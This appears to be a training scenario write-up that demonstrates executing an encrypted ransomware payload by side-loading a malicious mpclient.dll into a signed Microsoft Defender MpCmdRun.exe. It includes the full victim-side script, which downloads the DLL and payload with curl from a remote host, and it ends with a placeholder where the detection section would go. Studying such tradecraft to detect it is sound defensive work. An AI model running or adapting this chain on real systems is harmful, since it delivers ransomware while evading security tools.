Scenario
In this training scenario, we will execute an encrypted ransomware payload via DLL injection into a signed MS Defender. A custom DLL has been created, as an attacker would create it, which decrypts a fake .log file, and executes it.
Many security tools will simply ignore processes started by a signed parent, particularly a signed antivirus parent, and even more particularly Defender. Defender commands are not only often allowed, but are often extremely privileged. Here the command that is weaponized is a signature update, something that is not only common, but would be ignored from any sort of malware hunt. Here we demonstrate that even with simple “living off the land” trade craft, an attacker can execute privileged payloads by staging a simple script with no custom injection tools on the machine.
Here is the exact script run on the victim machine. Note how there is nothing explicitly malicious happening, copying the defender exe(s) to a staging directory is done just to highlight the C:\staging files in the root cause analysis.
mkdir C:\staging copy C:\Windows\WinSxS\amd64_windows-defender-service_31bf3856ad364e35_10.0.19041.746_none_a39f6d9ab59bd8b7\* C:\staging move C:\staging\mpclient.dll C:\staging\realdll.dll; cd C:\staging curl 169.254.247.102:8000/0x80004006.log -outfile 0x80004006.log; curl 169.254.247.102:8000/mpclient.dll -outfile mpclient.dll ./MpCmdRun.exe -SignatureUpdate
Breaking it down line by line:
Staging directory created
Defender copied to staging directory
Real mpclient.dll is renamed
Encrypted “log” file and malicious DLL are downloaded from a remote server
Real signed MpCmdRun is executed with signature update task
Identifying it
<< SCREENSHOTS GO HERE >>